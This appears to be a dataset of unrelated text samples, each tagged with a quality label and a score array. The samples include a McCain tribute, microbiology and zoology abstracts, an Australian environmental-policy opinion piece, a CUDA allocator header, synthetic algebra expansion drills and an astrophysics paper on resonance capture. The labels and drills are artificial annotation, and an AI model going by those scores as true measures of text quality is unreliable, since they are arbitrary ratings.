Now, we have our challenges—none more than the dishonesty and rancor of partisan warfare—but we too can measure up. My generation of combat veterans, now greying and beginning to move into the halls of leadership, must choose: to talk as equals with the liberal, tree-hugging fellow citizens who have never worn a uniform, or to never give an inch and instead seek stardom amongst our ilk. McCain had consistently chosen one path throughout his public life: to take his political opponents at their word, to ascribe to them the best intentions, and to avoid the easy seduction of seeing his political opponents as less then he. Veterans of my generation are no more or less citizens of this nation then those who never spent a day in uniform. We would do well to remember that, like John McCain did. Maybe, just maybe, if we can remember his example, it won’t matter how our shoes were shined, but the way we stand in them. John McCain stood straight, he never wavered, and we, who wore a uniform, will miss him. | Mid | [
0.6051282051282051,
29.5,
19.25
] |
The production of HlyA toxin by Proteus penneri strains. Twelve diverse strains of Proteus penneri of clinical origin all produced a calcium-dependent haemolysin, unlike most other Proteus spp. In most strains the haemolysin was secreted into the medium during early exponential growth and lysed not only of a variety of erythrocyte types from several animals including man, but also human neutrophils and human embryo lung fibroblasts. The haemolysin was a protein of 107 kDa, the same size as Escherichia coli HlyA, and it reacted with antiserum to E. coli HlyA. Because of its similarity in size, antigenicity and range of action to the HlyA virulence factor of E. coli, P. penneri HlyA is believed to be an important virulence factor for this organism. It was degradable by an EDTA-sensitive protease--probably the IgA protease--to inactive fragments. The interaction of P. penneri HlyA and IgA protease in vivo and the origin of HlyA, which has now been found in many diverse bacteria, are discussed. | Mid | [
0.637209302325581,
34.25,
19.5
] |
Even for the Abbott government the inconsistencies in the latest “war on environmental vigilantes and saboteurs” are astonishing. And the slapstick nature of its attempt to use the issue as a political wedge is up there with Laurel and Hardy. When an environment group successfully uses 16 year-old national environmental laws to delay a project, the Abbott government tries to change the law to prevent them from ever doing it again. But if an anti-windfarm group can’t find a way to use existing laws and regulations to stop or delay a project, the Abbott government tries to change laws and processes to make it easier for them to succeed. The first is called green “vigilantism” and “sabotage” and the second is, according to environment minister Greg Hunt, a reasonable response because “many people have a sense of deep anxiety, and they have a right to complain.” The government calls regulations that stop fossil fuel or mining projects “green tape”, but a wind commissioner and yet another scientific committee to look at unsubstantiated health complaints regarding wind turbines is apparently no kind of “tape” at all. Coalition to restrict green groups' right to challenge after Carmichael setback Read more Fossil fuel projects are judged by inflated assessments of the jobs they might provide. The prime minister and the treasurer keep repeating the claim that Adani’s $16bn Carmichael mine would create 10,000 jobs, even though evidence from an economist commissioned by Adani itself – Jerome Fahrer of ACIL Allen – given in the land court earlier this year said: “Over the life of the project it is projected that on average around 1,464 employee years of full-time equivalent direct and indirect jobs will be created. But when it comes to wind energy projects no claim seems too fantastic. The government can hardly contain its fury that environment groups might aim to delay or stop huge new coalmines because they are concerned about global effects of climate change, but assists and applauds anti-wind groups who use every available tactic to stop or delay renewable projects because they are worried about the health effects of “infrasound”. Here are some facts that might help more rational consideration of the issues at hand. The biggest danger to the Adani mine is its own business case, not environmental legal cases, and the Indian energy minister has unveiled plans for a rapid expansion of domestic coal production, as well as renewables, and said India aims to stop imports of thermal coal within three years, which undercuts somewhat the idea that the Adani mine’s coal is the only thing that can possibly provide power to impoverished Indians. And the tired old meme that says environmental protection and job creation are conflicting and contradictory objectives doesn’t fly any more. And it isn’t only “greenies” questioning the impact of mines and CSG wells, it’s farmers and rural communities as well. Ones often represented by the National party. A recent Essential poll found that 50% of Australians believe governments should prioritise support for renewables over the coal industry, including 39% of Liberal voters. Only 6% thought governments should prioritise support for coal. And the real reason the Adani decision was overturned was that Mackay Conservation Group identified a mistake made by the federal department of environment. It had failed to include “conservation advice” on two species that will be harmed by the mine. The minister did not have all the information he needed when he took the decision. The mistake can be fixed within weeks. But imagine how many serious procedural “mistakes” might get made in commonwealth decisions if no one except immediately impacted landholders have a right to challenge them. It’s a high price to pay for a political diversion. | Mid | [
0.5800865800865801,
33.5,
24.25
] |
#ifdef COMPILATION_INSTRUCTIONS (echo "#include\""$0"\"" > $0.cpp) && nvcc -ccbin cuda-c++ --compiler-options "-std=c++14" -I$HOME/prj/alf -D_TEST_MULTI_ADAPTORS_THRUST_ALLOCATOR_TRAITS $0.cpp -o $0x && $0x && rm $0.cpp $0x; exit #endif #ifndef BOOST_MULTI_ADAPTORS_THRUST_HPP #define BOOST_MULTI_ADAPTORS_THRUST_HPP //#include <thrust/host_vector.h> //#include <thrust/device_vector.h> #include "../../detail/memory.hpp" #include <thrust/device_allocator.h> #include<cassert> namespace thrust{ template<class T> device_ptr<T> to_address(device_ptr<T> p){return p;} } namespace boost{ namespace multi{ namespace memory{ template<typename T> //template<> class allocator_traits<thrust::device_allocator<T>>{ // using T = double; using Alloc = thrust::device_allocator<T>; public: using pointer = typename thrust::device_allocator<T>::pointer; using value_type = T; using size_type = typename thrust::device_allocator<T>::size_type; template<typename TT> using rebind_alloc = thrust::device_allocator<TT>; static pointer allocate(Alloc& a, size_type n){return a.allocate(n);} static void deallocate(Alloc& a, pointer p, size_type n){return a.deallocate(p, n);} private: static void construct(std::true_type, Alloc& a, pointer p){ cudaError_t s = cudaMemset(raw_pointer_cast(p), 0, sizeof(T)); assert( s == cudaSuccess ); } template<class... Args> static void construct(std::false_type, Alloc& a, pointer p, Args&&... args){ char buff[sizeof(T)]; ::new(buff) T(std::forward<Args>(args)...); // use ( ...) instead of { ...} for nvcc cudaError_t s = cudaMemcpy(raw_pointer_cast(p), buff, sizeof(T), cudaMemcpyHostToDevice); assert( s == cudaSuccess ); } public: template<class... Args> static void construct(Alloc& a, pointer p, Args&&... args){ construct(std::integral_constant<bool, sizeof...(Args) == 0 and std::is_trivially_default_constructible<T>{}>{}, a, p, std::forward<Args>(args)...); } private: static void destroy(std::true_type , Alloc& , pointer ){} static void destroy(std::false_type, Alloc& a, pointer p){ char buff[sizeof(T)]; cudaMemcpy(buff, raw_pointer_cast(p), sizeof(T), cudaMemcpyDeviceToHost); reinterpret_cast<T&>(buff).~T(); // ((T*)buff)->~T(); } public: static void destroy(Alloc& a, pointer p){destroy(std::is_trivially_destructible<T>{}, a, p);} }; } }} #ifdef _TEST_MULTI_ADAPTORS_THRUST_ALLOCATOR_TRAITS namespace multi = boost::multi; int main(){ thrust::device_allocator<double> aaa; thrust::device_ptr<double> p = std::allocator_traits<thrust::device_allocator<double>>::allocate(aaa, 10); // aaa.deallocate(p, 10); multi::allocator_traits<thrust::device_allocator<double>>::construct(aaa, p, 99.); // assert( p[0] == 99. ); #if 0 namespace multi = boost::multi; multi::array<double, 1, thrust::device_allocator<double>> A({100}, 0.); A[20] = 44.; multi::array<double, 1> A_host({100}, 99.); { // multi::array<double, 1, thrust::device_allocator<double>> Adev({10}, 0.); std::iota(begin(Adev), end(Adev), 0.); multi::array<double, 2, thrust::device_allocator<double>> Adev({3, 3}, 0.); std::iota(begin(Adev[2]), end(Adev[2]), 5.); std::cout <<"iota? "<< Adev[0][0] <<" "<< Adev[0][1] <<" "<< Adev[0][2] <<" " << std::endl; std::cout <<"iota? "<< Adev[1][0] <<" "<< Adev[1][1] <<" "<< Adev[1][2] <<" " << std::endl; std::cout <<"iota? "<< Adev[2][0] <<" "<< Adev[2][1] <<" "<< Adev[2][2] <<" " << std::endl; std::cout <<"----"<< std::endl; multi::array<double, 2> Ahos({3, 3}, 0.); // assert( Ahos[1].size() == Adev[2].size()); Ahos.rotated()[1] = Adev[2]; // Ahos.rotated()[0] = Adev[2]; std::cout <<"iota? "<< Ahos[0][0] <<" "<< Ahos[0][1] <<" "<< Ahos[0][2] <<" "<< std::endl; std::cout <<"iota? "<< Ahos[1][0] <<" "<< Ahos[1][1] <<" "<< Ahos[1][2] <<" "<< std::endl; std::cout <<"iota? "<< Ahos[2][0] <<" "<< Ahos[2][1] <<" "<< Ahos[2][2] <<" "<< std::endl; } return 0; { namespace multi = boost::multi; multi::array<double, 2, thrust::device_allocator<double>> A({100, 100}, 5.); multi::array<double, 2> B({100, 100}, 3.); // B = A; // assert( B[3][2] == 5. ); // multi::array<double, 2, thrust::device_allocator<double>> A({100, 100}, 0.); } assert( A_host[25] == 99. ); copy(begin(A), end(A), begin(A_host)); A_host = A; assert( size(A_host) == 100 ); std::cout << A_host[20] << std::endl; assert(A_host[20] == 44. ); // H has storage for 4 integers thrust::host_vector<int> H(4); // initialize individual elements H[0] = 14; H[1] = 20; H[2] = 38; H[3] = 46; // H.size() returns the size of vector H std::cout << "H has size " << H.size() << std::endl; // print contents of H for(int i = 0; i < H.size(); i++) std::cout << "H[" << i << "] = " << H[i] << std::endl; // resize H H.resize(2); std::cout << "H now has size " << H.size() << std::endl; // Copy host_vector H to device_vector D thrust::device_vector<int> D = H; // elements of D can be modified D[0] = 99; D[1] = 88; // print contents of D for(int i = 0; i < D.size(); i++) std::cout << "D[" << i << "] = " << D[i] << std::endl; // H and D are automatically deleted when the function returns return 0; #endif } #endif #endif | Low | [
0.521472392638036,
31.875,
29.25
] |
Immunocytochemical demonstration of androgen receptors in Leydig cells of the bank vole (Clethrionomys glareolus, Schreber): an in vitro study. Androgen receptors of the bank vole Leydig cells in vitro were immunostained using a polyclonal antibody against androgen receptors followed by streptavidine-peroxidase complex or rhodamine-labelled goat anti-rabbit IgG visualization. The immunocytochemical studies revealed localization of androgen receptors in the whole cytoplasm or in the perinuclear area of the cells. Addition of dehydroepiandrosterone into the culture medium resulted in nuclear localization of the androgen receptors. Long (18L : 6D) and short (6L : 18D) photoperiods as well as the age of animals were taken into account. The concentration of androgen receptors was changed dependent on age and status of reproduction. | High | [
0.668316831683168,
33.75,
16.75
] |
6*w**2 Expand (0 + 2*q + 0)*(-6 + 12 + 11) + 185*q - 87*q - 314*q. -182*q Expand (8788*s - 180 - 11 - 273 - 8786*s)*(-5*s + 3*s + s). -2*s**2 + 464*s Expand (2*m - 2*m**2 - 2*m)*(-16219*m**2 + 26*m**3 - 57*m**3 + 2504*m**2 + 29*m**3). 4*m**5 + 27430*m**4 Expand x - x + 2*x**3 + 0*x**3 - 2*x - 5*x**3 + 2*x**3 + 2 + 14*x**3 + 11*x + 6*x - 18*x + (0*x + x + x)*(19*x**2 - 34*x + 34*x). 51*x**3 - 3*x + 2 Expand (170 + 508 + 115 - 20)*(-4*q**4 + 4*q**4 - 6*q**4). -4638*q**4 Expand (-o + 3*o - o)*(-7*o + 14*o - o) + 134*o + 0*o**2 - 114*o - 1 + 6*o**2. 12*o**2 + 20*o - 1 Expand 566 + 591 - 1155 + 15*m - 5*m + 3*m + m + (3*m - 3*m - 2*m)*(-2 + 3 + 1). 10*m + 2 Expand 2*z**2 - 3*z**2 - 58*z**5 + 57*z**5 + (-14*z**2 + 2*z**3 + 14*z**2)*(2*z**2 + 0*z + 0*z). 3*z**5 - z**2 Expand (0 + n**2 + 0)*(-1363*n**3 + 6079*n**3 + 4726*n**3). 9442*n**5 Expand ((4 + 2 - 5)*(-3 + 2 - 1) - 2 - 4 + 27)*(-22*r**2 - 26*r**2 + 43*r**2). -95*r**2 Expand (-c**3 + 4*c**3 - 2*c**3)*(-2*c + 0*c - c) - 108*c**4 - 336*c**4 + 665*c**4 - 3*c**4 + 6*c**4 - 4*c**4. 217*c**4 Expand (-v + 3*v - 3*v)*(-27*v**3 - 5*v - 9*v + 13*v + (-v**2 - v + v)*(3*v - v - 3*v) + 18*v**3 + 3*v**2 - 3*v**2 - v**3 - 7*v + 7*v). 9*v**4 + v**2 Expand (-65 - 564 - 349)*(-2*d - 2*d + d). 2934*d Expand 2*c - 6*c + 2*c + (-149 - 240 - 208)*(-2 + c + 0*c - 1). -599*c + 1791 Expand (r**2 + 0*r**2 - 2*r**2)*(-11*r - 337 + 109 + 178 + (5*r - 4*r - 2*r)*(2 + 0 - 4)). 9*r**3 + 50*r**2 Expand (-4 + 4 - 2*r)*(-4 - 3 + 5) + (31 + 14 + 13)*(11*r + 2*r - 9*r) + 0*r - 7*r + r. 230*r Expand (33 + 17 - 18 + (3 + 4 - 5)*(3 - 5 + 0))*(-61 - n**2 + 61). -28*n**2 Expand (2*b**2 - 3*b**2 + 0*b**2)*(4*b + b - 3*b) - 13*b**3 + 7*b**3 - 11*b**3 - 4*b + b + 3*b - 15*b**3 + (-3 - b + 3)*(-6*b**2 + 0*b**2 + 16*b**2). -44*b**3 Expand (-3*h + 3*h - h)*(-22 - 57 + 16) + 88 - 88 + 37*h. 100*h Expand -x**2 + 3 - 3 - 1 - 4 - x**2 + 4 + (2*x**2 - 3*x**2 + 0*x**2)*(-4 - 3 + 5) - 4*x**2 - 2 + 2 + 6108*x**2 + 36463 - 36463. 6104*x**2 - 1 Expand 8*b**3 + 81 - 81 + (13*b**2 + 55 - 55)*(3*b - 3*b - 3*b) + 3*b**3 - 13*b**2 + 13*b**2. -28*b**3 Expand -52 - 15*g**2 + 52 - 4*g**2 + 0*g**2 + 2*g**2 + (0 + 5 - 4)*(2 + 2*g**2 - 2) + 70*g**2 - 35*g**2 + 64*g**2 + (3*g - 2*g - 3*g)*(-4 - g + 4). 86*g**2 Expand (-3*r - 3*r + 5*r)*(17932 + 3990*r + 6948*r - 17932 + 8498*r). -19436*r**2 Expand (-1109*q**2 + 102*q**3 + q + 1109*q**2)*(-7 - 9 + 6). -1020*q**3 - 10*q Expand -19*c**5 - 33*c**5 + 0*c**5 + (-4 + 1 + 6)*(0 + 3 - 2)*(-c**5 + 5*c**4 - 5*c**4). -55*c**5 Expand (-23208 - 33055 - 29775 - 24530 + 16753 + 16971)*(-4 + 4 + f). -76844*f Expand (1 - f - 1)*(10*f**2 - 43 + 43) + (f**2 - 5*f**2 + 2*f**2)*(-189*f - 168*f + 476*f). -248*f**3 Expand (4*z - 4*z - 2*z**2)*(-39322*z**2 + 99540*z**2 - 46838*z**2). -26760*z**4 Expand (k**2 - k**2 + k**3)*(-2*k**2 + 2*k**2 - 2*k**2) - 7626 - 4581*k**5 + 7626. -4583*k**5 Expand (-3*p + 2 - 2 - 3*p - p + 3*p + (5*p - 2*p - p)*(-6 + 2 + 2) - 2*p + 2*p + 2*p)*(551 + 372 + 344). -7602*p Expand (8*o**2 + 4*o**2 - 3*o**2)*(o + 0*o + 0*o)*(-3 + 4 - 2)*(-16 - 33 - 69). 1062*o**3 Expand (-3*h + 2*h + 2*h)*(0 - 2*h + 0)*(-1 + 1 - 4)*(4 - 1 - 5)*(59*h - 109*h + 52*h + 46). -32*h**3 - 736*h**2 Expand 5019*g**3 + 248633124*g - 248633124*g + 1 + g**3 - 1 + (-4 + 4 + g**2)*(g - 3*g + 3*g). 5021*g**3 Expand (-3 + 3 + 1)*(t**2 - 2*t + 2*t) + 2*t**2 - 6*t**2 - t**2 + (285*t - 23390 + 23390)*(t + 1 - 1). 281*t**2 Expand ((-1 + 2 - 3)*(1 - 4 + 0) - 3 - 4 + 5 + 11 + 93 + 0)*((-2*n**2 + 4*n - 4*n)*(0*n**3 - 3*n**3 + n**3) + n**4 - n**4 - n**5). 324*n**5 Expand 0*m + 3*m + 0*m + (-2*m + 4 - 4)*(-4 - 1 + 3) - 3*m + 4*m + m + (-65 + 44 - 29*m + 18)*(0 + 2 + 0 + 6 + 0 + 3 + (1 - 4 + 2)*(3 + 0 - 1)). -252*m - 27 Expand (-8*g + 22*g + 13*g)*(8*g**3 + 5*g**3 - 6*g**3 + (2 - g**2 - 2)*(0*g + 7*g + 5*g)). -135*g**4 Expand (-67 + 0 - 21)*(-5 + 1 + 2)*(-2 + 2 - q)*(q**2 + 0*q**2 - 4*q**2). 528*q**3 Expand (19 + 22 - 11)*(255*v + 10 - 110*v - 81*v - 91*v). -810*v + 300 Expand 3*j - 2*j + 0*j - 2*j - 1 + 1 - j - 2 + 2 + (4 - 2*j - 4)*(-5 + 4 + 3) + 0 + 0 - j - 58*j + 30 - 76*j + 66*j. -75*j + 30 Expand (0 + 0 - 78*t)*(-t**2 + 2*t**2 - 4*t**2)*(3 - 2*t**2 - 3) + 3*t**5 - 3*t + 3*t. -465*t**5 Expand (c**2 - 9*c + 9*c)*(-7 - 15 + 0)*(17 - 8 - 1)*(6*c - 2*c + c)*(-1 - 4 + 3). 1760*c**3 Expand (-43 - 15 + 395*y + 58)*(0 + 1 - 3 + (4 - 4 + 2)*(2 - 7 + 3)). -2370*y Expand (w - 5*w + 2*w)*(0 - 4 + 3 + (-2 + 0 + 4)*(-2 + 3 + 1) + (4 - 9 + 13)*(3 + 0 - 2)). -22*w Expand (1060*y - 240 + 124 + 117)*(5*y + y + 6*y). 12720*y**2 + 12*y Expand (96 + 103 - 25)*(-16*d - 4*d - 2*d**2 + 1 + 13*d). -348*d**2 - 1218*d + 174 Expand (-9025 + 228 - 3642 + 418)*(2*f**4 + 0*f**3 + 0*f**3). -24042*f**4 Expand (0*z - z + 2*z - 4*z + 2*z + z + (-1 + 1 - 2*z)*(2 + 1 - 5) + z + 3*z - 2*z)*(3 - 6 + 1)*(1 - 4 + 4)*(422 - 74 + 155). -6036*z Expand 2565 - 2*g**5 + 9*g**4 + 2500*g - 2500*g - 102 + (0*g**3 + 2*g**3 - 3*g**3)*(4*g**2 - g**2 - g**2). -4*g**5 + 9*g**4 + 2463 Expand -25*w**3 + 3*w**3 - 6*w**3 + (3*w**2 - 5*w**2 + 6*w**2)*(4 - 4 - w) + 0*w**3 - w**3 + 6 - 3. -33*w**3 + 3 Expand (v - 2 + 2 + (1 - 1 - 2*v)*(4 - 3 + 1) - v + v - 2*v + 6*v - v - 3*v)*(0 + 0 + 6)*(-23*v + 12*v - 23*v). 612*v**2 Expand (-3 - 1 + 6)*(272*j + 294*j + 95*j). 1322*j Expand (-44 - 76 - 272)*((2 - 3 + 0)*(0*i**2 - 3*i**2 + 4*i**2) - i**2 - i**2 + 4*i**2 + (2 - 4 + 3)*(-2*i**2 + 0*i**2 - 2*i**2) + i - i + i**2). 784*i**2 Expand -n**2 - 2 + 2 + (n - 4*n + 2*n)*((1 + 1 - 3)*(-6*n - 2*n + n) - 63*n + 119*n - 81*n). 17*n**2 Expand -664*u**4 - 32754*u**2 + 32754*u**2 - 3*u**4 + 2*u**4 + 0*u**4 + (0*u + 0*u + 2*u**3)*(4*u - u - 4*u). -667*u**4 Expand (-2 + 7 - 3)*(-293*o + 326*o - 219*o) - o + 3*o - o. -371*o Expand (1 - 14 - 19)*(-g**3 + 7*g**3 - 3*g**3) + 2*g**3 + 3*g**3 + 5*g**2 - g**2. -91*g**3 + 4*g**2 Expand (7*t - 2*t - 3*t)*(-815 + 19*t + 453 + 416). 38*t**2 + 108*t Expand (2 - 2 - 2)*(1786 - 5710 + 1992)*(1 - 5*q**2 - 1). -19320*q**2 Expand (-189*j - 6*j**2 + 189*j)*(1 + 15*j**3 + 8 - 20*j**3). 30*j**5 - 54*j**2 Expand (-9 + 170*o - 169*o - 10)*(-2 + 1 + 2)*(-2 + 1 - 7)*(30 - 11*o - 30). 88*o**2 - 1672*o Expand (-8 - 3*x + 17 - 6*x - 3*x + 7*x - 2*x + (2*x - 4*x + x)*(-5 + 2 + 2))*(-11*x + 3*x - 4*x). 72*x**2 - 108*x Expand -q**2 + 1 + 3*q**2 + 308049*q**3 - 306971*q**3 + (0 + 4 - 2)*(q - q**3 - q). 1076*q**3 + 2*q**2 + 1 Expand -k + 9*k - 2*k + (-38*k + 13*k + 16*k)*(-1 + 0 - 1 - 4 + 4 - 1 + 0 + 1 + 0 + (-4 + 3 + 2)*(-4 + 4 + 2) + 3 - 4 + 3) + 0 + 0 + 2*k. -10*k Expand (-x**4 + 2*x**4 - 3*x**4)*(-7 - 7 - 1) + (-13*x**2 - 111*x + 111*x)*(x + 8*x**2 - x) + 3*x**4 - 3*x**4 - x**4. -75*x**4 Expand (2 + 1 - 1)*(-1 + 0 - 1)*(2*j - j + j - 2*j - 2*j + 5*j + (-3*j + 5*j - j)*(0 + 0 + 1) + (25 - 25 - 18*j)*(-3 - 2 + 6)). 56*j Expand (-23*i + 3*i - 6*i)*(i - 2*i - 8*i) + 0*i**2 - 4*i**2 + i**2. 231*i**2 Expand (i**2 - 6*i**2 + 3*i**2)*(-14 + 4 + 3)*(-4 + 49*i + 4). 686*i**3 Expand (-1 + 0 + 5)*(11 - 21 - 10825*i + 27 - 17). -43300*i Expand 34*w**2 - 15*w**2 - 16*w**2 + 4 - 5*w**2 + 10 + 19 - 35 + w**2 + w - w + (4*w**2 + w**2 - 4*w**2)*(1 + 3 - 3) + 0 + 0 + 2*w**2. 2*w**2 - 2 Expand (-34*o**2 - 30*o**2 + 74*o**2)*(-5*o**2 - 7*o**2 + 14*o**2 - 2*o**3). -20*o**5 + 20*o**4 Expand (1073*z - 409*z + 665*z)*(-2*z + 2*z + 2*z)*(-7*z + z + z). -13290*z**3 Expand (14 + 25 + 0)*(-2*n**2 + 2*n**2 - 2*n**2 + (-3 + 1 - 1)*(-n**2 - n**2 - 3*n**2)). 507*n**2 Expand (9 - 333 - 2891)*(2*x - 4*x + 4*x). -6430*x Expand (2 + 2 - 2 + (5 + 0 - 3)*(3 + 2 - 4) + 0 - 2 + 1 + 2 + 0 - 3 - 3 + 4 + 4 + 4 + 0 + 6)*(30 + 3*p - 30). 51*p Expand (4 - 4 + j**2)*(-133*j**3 - 82650*j + 82711*j + 21*j**3). -112*j**5 + 61*j**3 Expand (0 + 0 - 2*m)*(-3*m**4 - m**4 + 2*m**4) + (m + 11 - 7 + 13)*(-11*m + 11*m**4 + 11*m). 15*m**5 + 187*m**4 Expand 3*x**5 + 3*x**5 - x**5 + (3*x**5 + 0*x**4 + 0*x**4)*((-2 - 4 + 4)*(2 - 3 + 0) + 1 - 3 + 3 + (18 + 25 - 13)*(0 - 3 + 0)). -256*x**5 Expand -5*r**5 + 58*r**2 - 58*r**2 + (r + 5 - 5)*(3*r - 3*r - r**4) - 5*r**4 + 5*r**4 - 12*r**5. -18*r**5 Expand (32 - 32 - 9*b)*(3 - 3 - b**2)*(32*b**2 + 7*b**2 + 7*b**2). 414*b**5 Expand ((-4 + 5 - 2)*(1 - 2 + 0) - 3 - 1 + 1)*(-19 + 19 - 5*a). 10*a Expand (-6*j**3 - 2*j**3 + 2*j**3)*(-14*j + 51 - 51)*(-2 + 1 + 3). 168*j**4 Expand (-3 + 1 + 0)*(-16 - 11 + 7)*(-110*a + 68*a + 60*a | Low | [
0.527649769585253,
28.625,
25.625
] |
--- abstract: | Because a chaotic zone can reduce the long timescale capture probabilities and cause catastrophic events such as close encounters with a planet or star during temporary capture, the dynamics of migrating planets is likely to be strongly dependent on the widths of the chaotic zones in their resonances. Previous theoretical work on the resonant capture of particles into mean-motion resonances by orbital migration has been restricted to the study of integrable models. By exploring toy 2 and 4 dimensional drifting Hamiltonian models we illustrate how the structure in phase space of a resonance can be used to generalize this integrable capture theory to include the richer phenomenology of a chaotic resonance. We show that particles are temporarily captured into the chaotic zone of a resonance with fixed shape and width for a time that is approximately given by the width of the chaotic zone divided by the resonance drift rate. Particles can be permanently captured into a drifting chaotic resonance only if they are captured into a growing non-stochastic region. Therefore resonances containing wide chaotic zones have lower permanent capture probabilities than those lacking chaotic zones. We expect large deviations from the predictions of integrable capture theories when the chaotic zone is large and the migration rate is sufficiently long that many Lyapunov times pass while particles are temporarily captured in the resonance. The 2:1 mean-motion resonance with Neptune in the Kuiper Belt contains a chaotic zone, even when integrated on fairly short timescales such as a million years. Because of the chaotic zone, the capture probability is lower than estimated previously from drifting integrable models. This may offer an explanation for low eccentricity Kuiper Belt objects between 45-47 AU which should have been previously captured in the 2:1 resonance by Neptune’s migration. author: - 'A. C. Quillen' title: The Capture of Particles by Chaotic Resonances During Orbital Migration --- Introduction ============ Scenarios incorporating the orbital migration of giant planets have been proposed to explain the orbit of Pluto and the eccentricity distribution of Kuiper Belt Objects ([@malhotra]), as well as the small orbital semi-major axes of many of the newly discovered extra-solar planets ([@murray]). A theory of resonant capture exists for well defined adiabatically varying non-chaotic integrable resonant systems (similar to pendulums, [@yoder]; [@henrard]; [@henrard83]). However, it now known that due to multiple resonance overlaps some of the mean-motion resonances in the solar system are in fact chaotic ([@wisdom]; [@holman]; [@murray98]). From their numerical integration, [@tittemore] and [@dermott] found that the chaotic nature of the resonances did influence the capture probabilities of resonances driving the evolution of the Uranian satellites. [@tittemore] showed that the Uranian satellites were temporarily captured into the chaotic zone associated with the separatrix of a resonance. Because chaotic resonances will always temporarily capture particles into their chaotic zones, the dynamics is fundamentally different than that of integrable resonances where no capture takes place unless the phase space volume of the resonance grows. Previous theoretical work on the capture process during orbital migration has been restricted to integrable models (e.g., [@henrard], [@malhotra88], [@borderies]). In this paper, by numerically investigating toy Hamiltonian models, we explore the general problem of capture by chaotic resonances. In our previous work we investigated numerically the affect of an orbiting giant planet on planetesimals interior to the planet ([@quillen]). We showed that the strong mean-motion resonances captured particles and caused catastrophic events such as ejection by the planet or an impact with the central star. We proposed that because impacts can enrich the metallicity of a star at a time when the star is no longer fully convective, the migration process offers an explanation for the high metallicities of stars with planets discovered via radial velocity searches. The theory of adiabatically varying integrable systems (e.g., [@henrard]; [@malhotra88]; [@borderies]; [@MD]) predicts permanent capture probabilities for integrable mean-motion resonances. However from our simulation we found that particles were often captured only for short periods of time. This was particularly evident in the simulations with slow migration rates. We can try to understand the problem with the understanding that the strong drifting resonances in the problem contain large chaotic zones. As we show below, when there is a chaotic zone, the probability of temporary capture into the resonance is 100%. Because a chaotic zone is incapable of permanently capturing particles in a drifting resonance, we expect that the probability of permanent capture drops as the width of the chaotic zone increases. We expect that the distribution of temporarily capture times and the probability of permanent capture depends on the width and variation of the chaotic zone, the drift rate of the planet, and the distribution of diffusion timescales in the zone. The Forced Pendulum Analogy =========================== These phenomena can be illustrated simply with a mathematical model for the forced pendulum. This is a simple two dimensional Hamiltonian system which exhibits the chaos caused by resonant overlap (e.g., [@holman]). The Hamiltonian is $$\begin{aligned} H(P,\psi) &=& {1 \over 2} P^2 + K\left[1 + a \cos(\nu t)\right]\cos(\psi) \\ &=& {1 \over 2} P^2 + K\cos(\psi) + {Ka \over 2} \left[ \cos(\psi+\nu t)+ \cos(\psi-\nu t) \right] \nonumber\end{aligned}$$ and has resonances at $p = 0,\pm \nu$ with $\psi = \pi$. To drift the resonance we modify the Hamiltonian $$H (P,\psi) = {1 \over 2} P^2 + K\left[1 + a \cos(\nu t)\right]\cos(\psi) + b P. \label{Ham_2D}$$ For the resonance to migrate or drift, $b$ must be a function of t. We can allow the resonance to grow without changing its shape if we set $\dot{a}=0$ and $\dot{K}>0$.. In Figure 1 we show the result of drifting two different systems, one with a large chaotic zone and the other without. We numerically integrated the above Hamiltonian using a conventional Burlisch-Stoer numerical scheme. Both numerical integrations pertain to systems with constant resonant widths and shapes ($\dot{K},\dot{a} = 0$). Since the size and shape of the resonance does not change with time, the capture probability predicted for a non-chaotic resonance is zero (e.g., [@henrard]). However when the chaotic zone is large, particles can spend a significant amount of time in the chaotic zone associated with the separatrix before passing to the other side of the resonance. We can define an effective width for the chaotic zone as $\Delta P_z = {V_z \over 2\pi}$ where $V_z$ is the volume in phase space of the chaotic zone connected to the separatrix. Particles spend different time periods temporarily captured in the chaotic zone. The distribution of temporary capture times has a lower edge at nearly zero time in the resonance. The mean length of time captured into the resonance is $$\Delta T_c = \Delta P_z / |\dot{b}|$$ when the shape of the resonance is held fixed. Because the chaotic zone may contain regions with different diffusion timescales, we expect that the final particle distribution will have a dependence on drift rate. To explore this we performed integrations for 3 different drift rates for the system shown on the right hand side of Figure 1. The final particle probability distributions are shown in Figure 2. For the faster drift rates, the final particle distribution is nearly flat, however for the slower drift rates, the distribution is more triangular and has a longer tail. In the longer integrations we expect that particles can be trapped in regions with longer diffusion timescales. The Probability of Capture -------------------------- As shown by [@yoder] and [@henrard], we can estimate the capture probability for an adiabatically drifting resonance by considering the volume of phase space per unit time which is passed by the separatrices of the resonance. We are referring to a system with 2 separatrices (the non-chaotic example shown in Figure 1). For $P_+(\psi,t)$ and $P_-(\psi,t)$ the momenta of the upper and lower separatrices as a function of angle and time, the rate of volume swept by the upper separatrix is $B_+$ where $B_+ \equiv \int_0^{2 \pi} {d \over dt} P_+(\psi,t) d\psi$. The growth rate of phase space volume in the resonance is $B_+ - B_-$, where $B_-$ is the corresponding expression for the lower separatrix. Particles swept up by the resonance must either be captured or ejected. The capture rate depends on the ratio of volume increase in the resonance to that swept up by the resonance and so is given by $$P_c = (B_+ - B_-)/ B_+.$$ This is shown with more rigor by [@henrard] for the drifting pendulum (Hamiltonian in equation (\[Ham\_2D\]) restricted to $a=0$). The probability of capture $$P_c = \left\{ \begin{array}{ccl} f && {{\rm if} ~ 0<f<1;} \\ 1 && {\rm if} ~ f \geq 1 \end{array} \right\}$$ where $$f = {2 \over 1 - {\pi \over 2}{\dot{b} \over \dot{K}}\sqrt{K}}. \label{fequal}$$ We have assumed that particles start at large $P$ and the growing resonance ($\dot{K} > 0$) drifts upwards ($\dot{b} <0$). If the resonance shrinks, $\dot{K} \leq 0$, then the permanent capture probability is zero. We have computed permanent capture probabilities for a series of systems with different sized chaotic zones by choosing different values for $a$ in each system. Since we do not allow $a$ to vary in each individual simulation, the shape (not size) of the resonance remains the same while the resonance drifts. For these simulations we set $\dot{K}$ such that when $a=0$ the probability of capture is $P_c = 1$. We see in Figure 3 that the permanent capture probability of the resonance drops when it has an decreasing volume fraction covered by integrable motion or stable islands. The fraction of the resonance covered by islands drops exponentially as $a\to 0$ so the capture probability exponentially approaches 1 for small $a$. When the resonance contains a chaotic separatrix, we expect its permanent capture probability to differ from that of a resonance of similar shape lacking a chaotic separatrix. In the limit of an entirely chaotic resonance, the resonance cannot permanently capture particles unless the resonance width grows faster than the drift rate and the resonance is effectively stationary. A drifting resonance requires a stable, integrable, non-chaotic, growing island to capture particles. We expect the capture probability to be given by $$P_c ={\dot{V_i}\over B_+}.$$ where $\dot{V_i}$ is the growth rate of the island or islands of non-chaotic phase space volume, and $B_+$ is the rate that particles are swept into the chaotic zone of 